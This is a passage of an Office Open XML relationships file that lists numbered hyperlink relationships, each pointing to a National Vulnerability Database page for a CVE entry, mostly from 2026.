Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102102" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102103" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102104" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102105" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62308" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87830" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92966" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102377" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103474" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94076" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94121" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94678" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94683" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95531" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96831" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97291" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102509" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102510" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102993" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102994" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102995" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102996" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102997" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102998" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102999" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103000" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103235" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47097" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55224" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97150" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102511" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103237" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46711" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102984" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102990" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102101" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103473" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87004" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93994" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100256" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101885" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47498" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47503" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47550" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47559" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62146" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100266" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19553" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55177" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62097" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96828" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54403" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58387" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101884" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102091" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6806" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75098" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89294" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92245" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95616" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96818" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103229" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103231" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47496" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76143" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102142" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102392" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103441" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79625" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85679" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93624" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93651" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93771" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94122" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94677" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96343" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96344" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96561" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96815" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96832" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96833" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97256" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97347" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102395" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103242" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47602" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94081" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96816" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97237" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92873" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102135" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102145" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100279" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102588" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102991" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103592" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16596" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67075" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91109" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94029" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97265" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14564" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11895" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14876" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6170" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6171" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6172" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6173" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88037" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92712" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93908" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102983" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103115" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103222" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103540" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103541" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103543" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91860" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103388" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103389" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55174" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103397" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103230" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103232" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97238" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100261" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101883" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103589" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103590" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12241" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103241" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103396" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103532" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92537" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92548" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93547" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97246" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92899" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102107" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102090" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102577" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103542" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88999" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103533" TargetMode="External" Id="rId159" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101887" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102138" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100264" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102582" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103114" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103116" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103012" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103113" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103117" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100689" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101147" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101148" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101896" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101899" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 